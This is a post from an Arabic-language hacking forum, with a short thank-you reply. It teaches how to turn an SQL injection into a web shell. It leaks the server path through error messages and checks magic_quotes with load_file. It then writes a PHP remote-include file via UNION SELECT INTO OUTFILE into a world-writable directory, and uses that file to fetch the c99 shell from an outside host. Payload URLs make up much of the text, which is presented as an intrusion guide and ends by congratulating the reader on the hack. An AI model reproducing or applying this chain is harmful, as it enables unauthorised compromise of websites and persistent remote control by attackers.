السلام عليكم و رحمة الله تعلى و بركاته -أرجو أن تكونوا في تمام الصحة و العافية- في الكثير من الحالات نستطيع حقن الموقع لكن لا نجد الأدمن و الباس أو يكون الباس غير قابل للكسر أو نجدها ولا نجد مسار لوحة التحكم أو يكون الموقع محمي بجدار ناري أردت أن أضيف لكم معلومة ( للذين لا يعرفونها ) نستطيع أن نرفع شل من حقنة السيكول و الطريقة كالتالي : أولا : يجب أن نعرف مسارنا على السرفر و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف -------------------------------------------------------------------- بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها ------------------------------------------------------------------- لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف ' و سيضهر لنا مسارنا على السرفر مع جملة الخطأ ----------------- مثال: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2 هذه جملة خطأ ومسارنا فيها.. و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد المهم نحفظ المسار و نتابع --------------- الآن نأتي لكيفية معرفة الmagic quotes on أو off لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة ب load_file('/') أي سيكون الإستغلال هكذا نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب http://www.target.com/file.php?id=-1...39,5,6,7,8,9 و نرى إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off و نستطيع مواصلة عملنا أما إذا كان ال magic quotes on فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة ------------------------------ طيب ضهر لنا الmagic quotes off ماذا نفعل ؟ ----------------------------- نبحث عن أي شيئ مصرح بتصريح 777 ----------------------------- و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية مثلا هذا مسار صورة www.target.com/images/image.jpg أي سيكون مسار الملف المصرح هو /images/ الذي يأتي بعد مسارنا على السرفر طبعا --------------------------------- نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه '<?include("$iraq"); ?>' و نضيف هذا الأمر في آخر السطر into+outfile+ ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة home/dudi/public_html/ ثم نضيف مسار الملف المصرح ب777 /images/ ثم اسم الملف المصاب المراد رفعه بإمتداد php مثلا example.php ------------------ ليكون الاستغلال كتالي PHP CODE www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php الآن تم إشائ الملف المقصود و هو هنا www.target.com/images/example.php الآن المرحلة الأخيرة هي رفع الشل على صيغة txt وذلك بالتالي كود PHP: http://www.target.com/images/example...xt.tc/c99.txt? طبعا http://c99.txt.tc/c99.txt هو مسار الشل بصيغة txt مرفوع جاهز و ألف مبروك على الإختراق-----
تقيما من البرد
مشكور والله يعطيك العافيه
عرض سحابة الكلمة الدلالية
قوانين المنتدى